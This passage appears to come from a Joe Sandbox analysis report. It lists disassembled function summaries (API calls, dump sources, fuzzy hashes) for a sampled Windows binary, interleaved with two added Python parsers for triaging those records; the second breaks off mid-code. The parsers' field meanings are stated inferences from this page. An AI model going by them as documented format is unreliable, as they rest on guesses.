• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
• Instruction ID: bb030f769259e8873057b5270d15da7be3544c17267ef04040301f1275ed4b43
• Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
• Instruction Fuzzy Hash: 90115121A0CA4A86EA146F25E558078FEB0FF49FAAFA45334D92E023D1DE3CD444C720
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE71F9
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE720D
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE7300
  • Part of subcall function 00007FF789BE5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF789BE75C4,?,?,00000000,00007FF789BE6999,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE5744
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: OpenSemaphore$CloseErrorHandleLast
• String ID: _p0$wil
• API String ID: 455305043-1814513734
• Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction ID: 262f36f4289be4c08934e305f260b7cd93afcdb3e612c9e6268f7b2b30144b51
• Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction Fuzzy Hash: 2061D261B1974A89EE25AF6594501BDABB9FF84F82FE44531DA0E07744EF3CE501C320
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspacememset$AllocProcess
• String ID: %s
• API String ID: 2401724867-3043279178
• Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
• Instruction ID: 95e9caf6f8eafff55496f850db8a7b275297a31a8bfdbd8917217398355056ba
• Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
• Instruction Fuzzy Hash: 2551C232B0868A85EB60AF21D8502B9BBB4FB48F96FA44035DA5D47794EF3CE441C720
Uniqueness
Uniqueness Score: -1.00%

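The function-summary blocks above are machine-generated and repetitive, and several of them (for example the two sharing API String ID 513048808-0) describe the same GetConsoleMode helper at different addresses. The script below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses blocks of this shape into records, computes image-relative offsets from the "Offset:" field, flags API String IDs that recur across functions (likely inlined runtime helpers, low triage priority), and collects the Instruction Fuzzy Hash values for pivoting to other reports. The block grammar is inferred from this page alone; the embedded SAMPLE is a constructed excerpt of three blocks from the report with the "Associated:" lines dropped and argument lists shortened.

```python
"""Parse Joe Sandbox IDA-plugin function summaries and pivot on them."""
import re
from collections import defaultdict

# Constructed excerpt of three blocks from this report (Associated:/Snapshot
# lines dropped, argument lists shortened); nothing here is invented data.
SAMPLE = """\
APIs
• _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904), ref: 00007FF789BD01D6
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF789BDE904), ref: 00007FF789BD0212
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BDE904), ref: 00007FF789BD0228
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF789BDE904), ref: 00007FF789BD023C
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BDE904), ref: 00007FF789BD0251
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Instruction Fuzzy Hash: 04213E2190D68A87EA506F65E588238FEB0FF4AF57FB45134DA1F02694DE7DD444C720
Uniqueness
Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00007FF789BD3584
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8), ref: 00007FF789BD35ED
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8), ref: 00007FF789BD3602
Similarity
• API String ID: 513048808-0
• Instruction Fuzzy Hash: 90115121A0CA4A86EA146F25E558078FEB0FF49FAAFA45334D92E023D1DE3CD444C720
Uniqueness Score: -1.00%

APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE71F9
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE720D
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE7300
  • Part of subcall function 00007FF789BE5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF789BE75C4), ref: 00007FF789BE5744
Strings
Similarity
• API ID: OpenSemaphore$CloseErrorHandleLast
• String ID: _p0$wil
• API String ID: 455305043-1814513734
• Instruction Fuzzy Hash: 2061D261B1974A89EE25AF6594501BDABB9FF84F82FE44531DA0E07744EF3CE501C320
Uniqueness Score: -1.00%
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
# "• [Part of subcall function ADDR: ]Name.Module[(args)][,] ref: ADDR"
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-F]+):\s*)?"
                    r"(\w+)\.([\w-]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")


def parse_blocks(text):
    """One dict per block; a block starts at 'APIs' and ends at 'Uniqueness Score:'."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, section = {"apis": [], "similarity": {}, "base": None, "uniqueness": None}, "APIs"
        elif cur is None or not line:
            continue
        elif line in HEADINGS:
            section = line
        elif line.startswith("Uniqueness Score:"):
            cur["uniqueness"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            blocks.append(cur)
            cur = None
        elif section == "APIs" and (m := API_RE.match(line)):
            sub, name, module, args, ref = m.groups()
            cur["apis"].append({"name": name, "module": module, "ref": ref,
                                "args": args or "", "subcall": sub})
        elif section == "Memory Dump Source" and (m := re.search(r"Offset:\s*([0-9A-F]+)", line)):
            cur["base"] = cur["base"] or m.group(1)    # image base of the dumped module
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur["similarity"][m.group(1)] = m.group(2)
    return blocks


def function_start(block):
    """Lowest direct (non-subcall) call site, used as a stand-in for the function address."""
    refs = [int(a["ref"], 16) for a in block["apis"] if a["subcall"] is None]
    return f"{min(refs):016X}" if refs else None


def rva(block, va):
    """Image-relative offset, stable across ASLR rebasing between runs."""
    return int(va, 16) - int(block["base"], 16) if block["base"] else None


def shared_code(blocks):
    """API String IDs that recur in more than one function: likely inlined helpers."""
    groups = defaultdict(list)
    for b in blocks:
        key, start = b["similarity"].get("API String ID"), function_start(b)
        if key and start:
            groups[key].append(start)
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def pivot_hashes(blocks):
    """(function start, Instruction Fuzzy Hash) pairs to look up in other reports."""
    return [(function_start(b), b["similarity"]["Instruction Fuzzy Hash"])
            for b in blocks if "Instruction Fuzzy Hash" in b["similarity"]]


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    print("shared helpers:", shared_code(parsed))
    for start, h in pivot_hashes(parsed):
        print(start, f"rva=0x{rva(parsed[0], start):X}", h)
```

Run it against the whole "Joe Sandbox IDA Plugin" section pasted into a file instead of SAMPLE to get the full map; the shared-helper output is the list of functions to skip before reading the remaining ones by hand.
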
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
                                                                                                                    • API ID: iswdigit
                                                                                                                    • String ID: GeToken: (%x) '%s'
                                                                                                                    • API String ID: 3849470556-1994581435
                                                                                                                    • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                    • Instruction ID: 4ccf32908bc8f0a3a7b37b05489718d9b68e1c6949ec681cbd4bfbd0e642b850
                                                                                                                    • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                    • Instruction Fuzzy Hash: D1517C31A0864AC5EB64AF65E444279BBB0FF84F6AFA48435DA4D47390DF7DE841C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE9A10
                                                                                                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BE9994
                                                                                                                      • Part of subcall function 00007FF789BEA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA77A
                                                                                                                      • Part of subcall function 00007FF789BEA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA839
                                                                                                                      • Part of subcall function 00007FF789BEA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA850
                                                                                                                    • wcsrchr.MSVCRT ref: 00007FF789BE9A62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                    • String ID: %s=%s$.
                                                                                                                    • API String ID: 3242694432-4275322459
                                                                                                                    • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                    • Instruction ID: 5414297cb00c008a79c1dbf11244db86b8437f34369ac74d58853153d79de8b8
                                                                                                                    • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                    • Instruction Fuzzy Hash: FD41BD25A0964E85EE10BF91A0542BDEAB4FF85FA6FA45230DD5D073D2EE7CE449C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BE54E6
                                                                                                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE552E
                                                                                                                      • Part of subcall function 00007FF789BE758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF789BE6999,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE75AE
                                                                                                                      • Part of subcall function 00007FF789BE758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF789BE6999,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE75C6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                    • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                    • API String ID: 779401067-630742106
                                                                                                                    • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                    • Instruction ID: cad2fa252db2ab87e3651f123781cc645adeca30fc82f674049ff35c94ffe5d2
                                                                                                                    • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                    • Instruction Fuzzy Hash: 64516372A1868A85EB11AF11E4507FEEB74FF84F85FA04032EA4D47A55DE7CE405C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectorytowupper
                                                                                                                    • String ID: :$:
                                                                                                                    • API String ID: 238703822-3780739392
                                                                                                                    • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                    • Instruction ID: 98cff1a5754eb343d300de2a7997e97f027f66ac9d6b745524dd50b779719243
                                                                                                                    • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                    • Instruction Fuzzy Hash: 8011E25260974585EB25AF61A818279FEB0FF89F9AF958132DD0D07790EF3CD041C724
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                    • API String ID: 3677997916-3870813718
                                                                                                                    • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                    • Instruction ID: fcd01f18133ca2b31be13d4ffb338f541432e79ad7d6c3cd399daa0314935dcb
                                                                                                                    • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                    • Instruction Fuzzy Hash: 4E114F32618B45C7E7109F10E44826AFBB4FB85BA5F904131DA8D02768EFBCC048CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcsrchr$wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 110935159-0
                                                                                                                    • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                    • Instruction ID: c77ceb5a62c36ffc044e3398d58599ab14a4d0c5bd6a39a1a447ed20a0a435f0
                                                                                                                    • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                    • Instruction Fuzzy Hash: E351C722B0978A85FA25AF5198047F9EBB5BF49FBAFA44530CD5E07784DE3CE541C210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$CurrentDirectorytowupper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1403193329-0
                                                                                                                    • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                    • Instruction ID: cfce7da31b5c915edee0c46d5dfa7cbb31c75f7653b501316315413a2e349f04
                                                                                                                    • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                    • Instruction Fuzzy Hash: 2F51D826A09689C5EB24EF20D8586B9BBB0FF48F9AF958135DA0D07794EF3CD544C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%
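The function records above are flat text, so pulling the API sets, referenced strings and dump metadata out of them for triage (which functions touch the registry, which create a mutex, which memory region a record came from) is easier with a small parser. The following is an added example, not Joe Sandbox's own code or output. It assumes the record layout seen on this page ('APIs' bullets of the form 'Name.Module ref: addr', subcall lines prefixed 'Part of subcall function <addr>:', a 'Source File: <dump>.sdmp, Offset: ..., based on PE: ...' line, 'Similarity' key/value bullets, and a closing 'Uniqueness Score:' line). The meaning of the dotted fields in the .sdmp name (process index, stage, dump id, base, PAGE_* protection) and the use of '$' as the item separator inside the ID fields are inferred from the values on this page, not documented behaviour. The sample text is constructed from two of the records above.

```python
"""Parser for the per-function records of a Joe Sandbox disassembly section.

Added example, not Joe Sandbox's own code.  The .sdmp field meanings and the
'$' item separator are assumptions inferred from this report's values.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Assumption: the fifth .sdmp field is a Windows PAGE_* protection constant
# (0x20 on the code dump, 0x02/0x04 on the data dumps of this report).
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
REGISTRY_APIS = {"RegOpenKeyExW", "RegEnumKeyExW", "RegQueryValueExW",
                 "RegSetValueExW", "RegCloseKey"}

SUBCALL = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
API_REF = re.compile(r"^(?P<name>[^\s.]+)\.(?P<module>[^\s(,]+)(?:\([^)]*\))?,?\s+ref:\s*(?P<addr>[0-9A-Fa-f]+)$")
SDMP = re.compile(r"^Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)")
KV = re.compile(r"^(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")


@dataclass
class ApiRef:
    name: str
    module: str
    addr: int
    caller: Optional[int]  # subcall function the reference sits in, else None


@dataclass
class DumpSource:
    process_index: int  # assumption: Joe Sandbox per-analysis process number
    stage: int          # assumption: dump stage (2 on every dump of this report)
    dump_id: int
    base: int
    protection: int
    protection_name: str


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    dump: Optional[str] = None
    image_base: Optional[int] = None
    fields: dict = field(default_factory=dict)


def parse_dump_name(name: str) -> DumpSource:
    """Split e.g. '00000004.00000002.2002326192.00007FF789BC1000.00000020.<3 more>.sdmp'."""
    parts = name[: -len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected .sdmp name: {name}")
    prot = int(parts[4], 16)
    return DumpSource(int(parts[0]), int(parts[1]), int(parts[2]),
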